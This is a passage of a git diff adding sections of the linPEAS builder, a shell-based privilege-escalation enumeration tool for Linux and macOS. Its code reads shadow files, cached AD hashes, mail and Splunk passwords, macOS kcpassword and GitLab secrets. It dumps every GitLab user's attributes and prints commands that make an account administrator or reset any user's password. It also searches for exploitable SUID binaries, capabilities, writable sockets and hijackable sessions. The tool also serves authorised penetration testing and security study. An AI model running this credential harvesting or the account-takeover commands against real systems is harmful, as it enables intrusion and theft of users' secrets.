"$PSTORAGE_VAULT_SSH_TOKEN" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null +elif [ "$DEBUG" ]; then echo_not_found "vault-ssh-helper.hcl" +fi +echo "" + +#-- SI) Cached AD Hashes +adhashes=$(ls "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null) +if [ "$adhashes" ] || [ "$DEBUG" ]; then + print_2title "Searching AD cached hashes" + ls -l "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null + echo "" +elif [ "$DEBUG" ]; then echo_not_found +fi + +#-- SI) Screen sessions +if [ "$screensess" ] || [ "$screensess2" ] || [ "$DEBUG" ]; then + print_2title "Searching screen sessions" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" + screensess=$(screen -ls 2>/dev/null) + screensess2=$(find /run/screen -type d -path "/run/screen/S-*" 2>/dev/null) + + screen -v + printf "$screensess\n$screensess2" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,No Sockets found.*,${C}[32m&${C}[0m," + + find /run/screen -type s -path "/run/screen/S-*" -not -user $USER '(' '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null | while read f; do + echo "Other user screen socket is writable: $f" | sed "s,$f,${SED_RED_YELLOW}," + done + echo "" +elif [ "$DEBUG" ]; then echo_not_found +fi + +#-- SI) Tmux sessions +tmuxdefsess=$(tmux ls 2>/dev/null) +tmuxnondefsess=$(ps auxwww | grep "tmux " | grep -v grep) +tmuxsess2=$(find /tmp -type d -path "/tmp/tmux-*" 2>/dev/null) +if [ "$tmuxdefsess" ] || [ "$tmuxnondefsess" ] || [ "$tmuxsess2" ] || [ "$DEBUG" ]; then + print_2title "Searching tmux sessions"$N + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" + tmux -V + printf "$tmuxdefsess\n$tmuxnondefsess\n$tmuxsess2" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,no server running on.*,${C}[32m&${C}[0m," + + find /tmp -type s -path "/tmp/tmux*" -not -user $USER '(' '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null | while read f; do + echo "Other user tmux socket is writable: $f" | sed "s,$f,${SED_RED_YELLOW}," + done + echo "" +elif [ "$DEBUG" ]; then echo_not_found +fi + +peass{CouchDB} + +peass{Redis} + +#-- SI) Dovecot +# Needs testing +dovecotpass=$(grep -r "PLAIN" /etc/dovecot 2>/dev/null) +if [ "$dovecotpass" ] || [ "$DEBUG" ]; then + print_2title "Searching dovecot files" + if [ -z "$dovecotpass" ]; then + echo_not_found "dovecot credentials" + else + printf "%s\n" "$dovecotpass" | while read d; do + df=$(echo $d |cut -d ':' -f1) + dp=$(echo $d |cut -d ':' -f2-) + echo "Found possible PLAIN text creds in $df" + echo "$dp" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null + done + fi + echo "" +elif [ "$DEBUG" ]; then echo_not_found +fi + +peass{Mosquitto} + +peass{Neo4j} + +peass{Cloud Credentials} + +peass{Cloud Init} + +peass{CloudFlare} + +peass{Erlang} + +peass{GMV Auth} + +peass{IPSec} + +peass{IRSSI} + +peass{Keyring} + +peass{Filezilla} + +peass{Backup Manager} + +##-- SI) passwd files (splunk) +SPLUNK_BIN="$(command -v splunk 2>/dev/null)" +if [ "$PSTORAGE_SPLUNK" ] || [ "$SPLUNK_BIN" ] || [ "$DEBUG" ]; then + print_2title "Searching uncommon passwd files (splunk)" + if [ "$SPLUNK_BIN" ]; then echo "splunk binary was found installed on $SPLUNK_BIN" | sed "s,.*,${SED_RED},"; fi + printf "%s\n" "$PSTORAGE_SPLUNK" | sort | uniq | while read f; do + if [ -f "$f" ] && ! [ -x "$f" ]; then + echo "passwd file: $f" | sed "s,$f,${SED_RED}," + cat "$f" 2>/dev/null | grep "'pass'|'password'|'user'|'database'|'host'|\$" | sed -${E} "s,password|pass|user|database|host|\$,${SED_RED}," + fi + done + echo "" +elif [ "$DEBUG" ]; then echo_not_found +fi + +if [ "$PSTORAGE_KCPASSWORD" ] || [ "$DEBUG" ]; then + print_2title "Analyzing kcpassword files" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#kcpassword" + printf "%s\n" "$PSTORAGE_KCPASSWORD" | while read f; do + echo "$f" | sed -${E} "s,.*,${SED_RED}," + base64 "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," + done + echo "" +elif [ "$DEBUG" ]; then echo_not_found +fi + +##-- SI) Gitlab +if [ "$(command -v gitlab-rails)" ] || [ "$(command -v gitlab-backup)" ] || [ "$PSTORAGE_GITLAB" ] || [ "$DEBUG" ]; then + print_2title "Searching GitLab related files" + #Check gitlab-rails + if [ "$(command -v gitlab-rails)" ]; then + echo "gitlab-rails was found. Trying to dump users..." + gitlab-rails runner 'User.where.not(username: "peasssssssss").each { |u| pp u.attributes }' | sed -${E} "s,email|password,${SED_RED}," + echo "If you have enough privileges, you can make an account under your control administrator by running: gitlab-rails runner 'user = User.find_by(email: \"youruser@example.com\"); user.admin = TRUE; user.save!'" + echo "Alternatively, you could change the password of any user by running: gitlab-rails runner 'user = User.find_by(email: \"admin@example.com\"); user.password = \"pass_peass_pass\"; user.password_confirmation = \"pass_peass_pass\"; user.save!'" + echo "" + fi + if [ "$(command -v gitlab-backup)" ]; then + echo "If you have enough privileges, you can create a backup of all the repositories inside gitlab using 'gitlab-backup create'" + echo "Then you can get the plain-text with something like 'git clone \@hashed/19/23/14348274[...]38749234.bundle'" + echo "" + fi + #Check gitlab files + printf "%s\n" "$PSTORAGE_GITLAB" | sort | uniq | while read f; do + if echo $f | grep -q secrets.yml; then + echo "Found $f" | sed "s,$f,${SED_RED}," + cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" + elif echo $f | grep -q gitlab.yml; then + echo "Found $f" | sed "s,$f,${SED_RED}," + cat "$f" | grep -A 4 "repositories:" + elif echo $f | grep -q gitlab.rb; then + echo "Found $f" | sed "s,$f,${SED_RED}," + cat "$f" | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,email|user|password,${SED_RED}," + fi + echo "" + done + echo "" +elif [ "$DEBUG" ]; then echo_not_found +fi + +peass{Github} + +peass{Svn} + +peass{PGP-GPG} + +peass{Cache Vi} + +peass{Wget} + +##-- SI) containerd installed +containerd=$(command -v ctr) +if [ "$containerd" ] || [ "$DEBUG" ]; then + print_2title "Checking if containerd(ctr) is available" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation" + if [ "$containerd" ]; then + echo "ctr was found in $containerd, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," + ctr image list + fi + echo "" +elif [ "$DEBUG" ]; then echo_not_found +fi + +##-- SI) runc installed +runc=$(command -v runc) +if [ "$runc" ] || [ "$DEBUG" ]; then + print_2title "Checking if runc is available" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation" + if [ "$runc" ]; then + echo "runc was found in $runc, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," + fi + echo "" +elif [ "$DEBUG" ]; then echo_not_found +fi + +#-- SI) Docker +if [ "$PSTORAGE_DOCKER" ] || [ "$DEBUG" ]; then + print_2title "Searching docker files (limit 70)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket" + printf "%s\n" "$PSTORAGE_DOCKER" | head -n 70 | while read f; do + ls -l "$f" 2>/dev/null + if ! [ "$IAMROOT" ] && [ -S "$f" ] && [ -w "$f" ]; then + echo "Docker socket file ($f) is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," + fi + done + echo "" +elif [ "$DEBUG" ]; then echo_not_found +fi + +peass{Firefox} + +peass{Chrome} + +peass{Autologin} + +#-- SI) S/Key athentication +if (grep auth= /etc/login.conf 2>/dev/null | grep -v "^#" | grep -q skey) || [ "$DEBUG" ] ; then + print_2title "S/Key authentication" + printf "System supports$RED S/Key$NC authentication\n" + if ! [ -d /etc/skey/ ]; then + echo "${GREEN}S/Key authentication enabled, but has not been initialized" + elif ! [ "$IAMROOT" ] && [ -w /etc/skey/ ]; then + echo "${RED}/etc/skey/ is writable by you" + ls -ld /etc/skey/ + else + ls -ld /etc/skey/ 2>/dev/null + fi +elif [ "$DEBUG" ]; then echo_not_found +fi +echo "" + +#-- SI) YubiKey athentication +if (grep "auth=" /etc/login.conf 2>/dev/null | grep -v "^#" | grep -q yubikey) || [ "$DEBUG" ]; then + print_2title "YubiKey authentication" + printf "System supports$RED YubiKey$NC authentication\n" + if ! [ "$IAMROOT" ] && [ -w /var/db/yubikey/ ]; then + echo "${RED}/var/db/yubikey/ is writable by you" + ls -ld /var/db/yubikey/ + else + ls -ld /var/db/yubikey/ 2>/dev/null + fi + echo "" +elif [ "$DEBUG" ]; then echo_not_found +fi + +peass{SNMP} + +peass{Pypirc} + +peass{Postfix} + +peass{Ldaprc} + +peass{Env} + +peass{Msmtprc} + +peass{Keepass} + +peass{FTP} + +peass{EXTRA_SECTIONS} + +peass{Interesting logs} + +peass{Windows Files} + +peass{Other Interesting Files} diff --git a/linPEAS/builder/linpeas_parts/7_interesting_files.sh b/linPEAS/builder/linpeas_parts/7_interesting_files.sh new file mode 100644 index 0000000..4cdcd96 --- /dev/null +++ b/linPEAS/builder/linpeas_parts/7_interesting_files.sh @@ -0,0 +1,632 @@ +########################################### +#----------) Interesting files (----------# +########################################### + +check_critial_root_path(){ + folder_path="$1" + if [ -w "$folder_path" ]; then echo "You have write privileges over $folder_path" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if [ "$(find $folder_path -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $folder_path -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if [ "$(find $folder_path -type f -not -user root 2>/dev/null)" ]; then echo "The following files aren't owned by root: $(find $folder_path -type f -not -user root 2>/dev/null)"; fi +} + + + + + + + + +##-- IF) SUID +print_2title "SUID - Check easy privesc, exploits and write perms" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" +if ! [ "$STRINGS" ]; then + echo_not_found "strings" +fi +if ! [ "$STRACE" ]; then + echo_not_found "strace" +fi +suids_files=$(find / -perm -4000 -type f ! -path "/dev/*" 2>/dev/null) +for s in $suids_files; do + s=$(ls -lahtr "$s") + #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder + if echo "$s" | grep -qE "^total"; then break; fi + + sname="$(echo $s | awk '{print $9}')" + if [ "$sname" = "." ] || [ "$sname" = ".." ]; then + true #Don't do nothing + elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then + echo "You own the SUID file: $sname" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) + echo "You can write SUID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else + c="a" + for b in $sidB; do + if echo $s | grep -q $(echo $b | cut -d % -f 1); then + echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," + c="" + break; + fi + done; + if [ "$c" ]; then + if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then + echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," + else + echo "$s (Unknown SUID binary)" | sed -${E} "s,/.*,${SED_RED}," + printf $ITALIC + if ! [ "$FAST" ] && [ "$STRINGS" ]; then + $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do + sline_first="$(echo "$sline" | cut -d ' ' -f1)" + if echo "$sline_first" | grep -qEv "$cfuncs"; then + if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path + if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n" + fi + else #If not a path + if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then #Check if existing binary + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n" + fi + fi + fi + done + if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && ! [ "$NOTEXPORT" ] && [ -x "$sname" ]; then + printf $ITALIC + echo "----------------------------------------------------------------------------------------" + echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." + OLD_LD_LIBRARY_PATH=$LD_LIBRARY_PATH + export LD_LIBRARY_PATH="" + timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" + printf $NC + export LD_LIBRARY_PATH=$OLD_LD_LIBRARY_PATH + echo "----------------------------------------------------------------------------------------" + echo "" + fi + fi + fi + fi + fi +done; +echo "" + + +##-- IF) SGID +print_2title "SGID" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" +sgids_files=$(find / -perm -2000 -type f ! -path "/dev/*" 2>/dev/null) +for s in $sgids_files; do + s=$(ls -lahtr "$s") + #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder + if echo "$s" | grep -qE "^total";then break; fi + + sname="$(echo $s | awk '{print $9}')" + if [ "$sname" = "." ] || [ "$sname" = ".." ]; then + true #Don't do nothing + elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then + echo "You own the SGID file: $sname" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) + echo "You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else + c="a" + for b in $sidB; do + if echo "$s" | grep -q $(echo $b | cut -d % -f 1); then + echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," + c="" + break; + fi + done; + if [ "$c" ]; then + if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then + echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," + else + echo "$s (Unknown SGID binary)" | sed -${E} "s,/.*,${SED_RED}," + printf $ITALIC + if ! [ "$FAST" ] && [ "$STRINGS" ]; then + $STRINGS "$sname" | sort | uniq | while read sline; do + sline_first="$(echo $sline | cut -d ' ' -f1)" + if echo "$sline_first" | grep -qEv "$cfuncs"; then + if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path + if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n" + fi + else #If not a path + if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then #Check if existing binary + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n" + fi + fi + fi + done + if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && [ ! "$SUPERFAST" ]; then + printf "$ITALIC" + echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." + timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" + printf "$NC" + echo "" + fi + fi + fi + fi + fi +done; +echo "" + +##-- IF) Misconfigured ld.so +print_2title "Checking misconfigurations of ld.so" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#ld-so" +printf $ITALIC"/etc/ld.so.conf\n"$NC; +cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" +cat /etc/ld.so.conf 2>/dev/null | while read l; do + if echo "$l" | grep -q include; then + ini_path=$(echo "$l" | cut -d " " -f 2) + fpath=$(dirname "$ini_path") + if [ "$(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + printf $ITALIC"$fpath\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + for f in $fpath/*; do + printf $ITALIC" $f\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + cat "$f" | grep -v "^#" | sed -${E} "s,$ldsoconfdG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + done + fi +done +echo "" + +##-- IF) Capabilities +print_2title "Capabilities" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" +echo "Current capabilities:" +(capsh --print 2>/dev/null | grep "Current:" | sed -${E} "s,$capsB,${SED_RED_YELLOW}," ) || echo_not_found "capsh" +(cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$$/status" +echo "" +echo "Shell capabilities:" +(capsh --decode=0x"$(cat /proc/$PPID/status 2>/dev/null | grep CapEff | awk '{print $2}')" 2>/dev/null) || echo_not_found "capsh" +(cat "/proc/$PPID/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$PPID/status" +echo "" +echo "Files with capabilities (limited to 50):" +getcap -r / 2>/dev/null | head -n 50 | while read cb; do + capsVB_vuln="" + + for capVB in $capsVB; do + capname="$(echo $capVB | cut -d ':' -f 1)" + capbins="$(echo $capVB | cut -d ':' -f 2)" + if [ "$(echo $cb | grep -Ei $capname)" ] && [ "$(echo $cb | grep -E $capbins)" ]; then + echo "$cb" | sed -${E} "s,.*,${SED_RED_YELLOW}," + capsVB_vuln="1" + break + fi + done + + if ! [ "$capsVB_vuln" ]; then + echo "$cb" | sed -${E} "s,$capsB,${SED_RED}," + fi + + if ! [ "$IAMROOT" ] && [ -w "$(echo $cb | cut -d" " -f1)" ]; then + echo "$cb is writable" | sed -${E} "s,.*,${SED_RED}," + fi +done +echo "" + +##-- IF) Users with capabilities +if [ -f "/etc/security/capability.conf" ] || [ "$DEBUG" ]; then + print_2title "Users with capabilities" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" + if [ -f "/etc/security/capability.conf" ]; then + grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," + else echo_not_found "/etc/security/capability.conf" + fi + echo "" +fi + +##-- IF) Files with ACLs +print_2title "Files with ACLs (limited to 50)" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls" +( (getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," + +if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! [ "$(command -v getfacl)" ]; then #Find ACL files in macos (veeeery slow) + ls -RAle / 2>/dev/null | grep -v "group:everyone deny delete" | grep -E -B1 "\d: " | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," +fi +echo "" + +##-- IF) Files with ResourceFork +#if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then # TOO SLOW, CHECK IT LATER +# print_2title "Files with ResourceFork" +# print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#resource-forks-or-macos-ads" +# find $HOMESEARCH -type f -exec ls -ld {} \; 2>/dev/null | grep -E ' [x\-]@ ' | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.ResourceFork" +#fi +#echo "" + +##-- IF) .sh files in PATH +print_2title ".sh files in path" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path" +echo $PATH | tr ":" "\n" | while read d; do + for f in $(find "$d" -name "*.sh" 2>/dev/null); do + if ! [ "$IAMROOT" ] && [ -O "$f" ]; then + echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits) + echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else + echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},"; + fi + done +done +echo "" + + +broken_links=$(find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken) +if [ "$broken_links" ] || [ "$DEBUG" ]; then + print_2title "Broken links in path" + echo $PATH | tr ":" "\n" | while read d; do + find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken | sed -${E} "s,broken,${SED_RED},"; + done + echo "" +fi + + +if [ "$MACPEAS" ]; then + print_2title "Unsigned Applications" + macosNotSigned /System/Applications +fi + +##-- IF) Unexpected folders in / +print_2title "Unexpected in root" +if [ "$MACPEAS" ]; then + (find / -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found +else + (find / -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found +fi +echo "" + +##-- IF) Files (scripts) in /etc/profile.d/ +print_2title "Files (scripts) in /etc/profile.d/" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files" +if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a MacOS + (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/" + check_critial_root_path "/etc/profile" + check_critial_root_path "/etc/profile.d/" +fi +echo "" + + ##-- IF) Files (scripts) in /etc/init.d/ +print_2title "Permissions in init, init.d, systemd, and rc.d" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d" +if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a MacOS + check_critial_root_path "/etc/init/" + check_critial_root_path "/etc/init.d/" + check_critial_root_path "/etc/rc.d/init.d" + check_critial_root_path "/usr/local/etc/rc.d" + check_critial_root_path "/etc/rc.d" + check_critial_root_path "/etc/systemd/" + check_critial_root_path "/lib/systemd/" +fi + +echo "" + +##-- IF) Hashes in passwd file +print_list "Hashes inside passwd file? ........... " +if grep -qv '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +##-- IF) Writable in passwd file +print_list "Writable passwd file? ................ " +if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," +elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," +elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," +else echo_no +fi + +##-- IF) Credentials in fstab +print_list "Credentials in fstab/mtab? ........... " +if grep -qE "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +##-- IF) Read shadow files +print_list "Can I read shadow files? ............. " +if [ "$(cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null)" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +print_list "Can I read shadow plists? ............ " +possible_check="" +(for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no + +print_list "Can I write shadow plists? ........... " +possible_check="" +(for l in /var/db/dslocal/nodes/Default/users/*; do if [ -w "$l" ];then echo "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no + +##-- IF) Read opasswd file +print_list "Can I read opasswd file? ............. " +if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo "" +else echo_no +fi + +##-- IF) network-scripts +print_list "Can I write in network-scripts? ...... " +if ! [ "$IAMROOT" ] && [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${SED_RED_YELLOW}," +elif [ "$(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges on $(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW}," +else echo_no +fi + +##-- IF) Read root dir +print_list "Can I read root folder? .............. " +(ls -al /root/ 2>/dev/null | grep -vi "total 0") || echo_no +echo "" + +##-- IF) Root files in home dirs +print_2title "Searching root files in home dirs (limit 30)" +(find $HOMESEARCH -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_RED},") || echo_not_found +echo "" + +##-- IF) Others files in my dirs +if ! [ "$IAMROOT" ]; then + print_2title "Searching folders owned by me containing others files on it (limit 100)" + (find / -type d -user "$USER" ! -path "/proc/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec dirname {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${C}[1;13m&${C}[0m,g" + echo "" +fi + +##-- IF) Readable files belonging to root and not world readable +if ! [ "$IAMROOT" ]; then + print_2title "Readable files belonging to root and readable by me but not world readable" + (find / -type f -user root ! -perm -o=r 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${SED_RED},"; fi; done) || echo_not_found + echo "" +fi + +##-- IF) Modified interesting files into specific folders in the last 5mins +print_2title "Modified interesting files in the last 5mins (limit 100)" +find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! -path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${SED_RED}," +echo "" + +##-- IF) Writable log files +print_2title "Writable log files (logrotten) (limit 100)" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation" +logrotate --version 2>/dev/null || echo_not_found "logrotate" 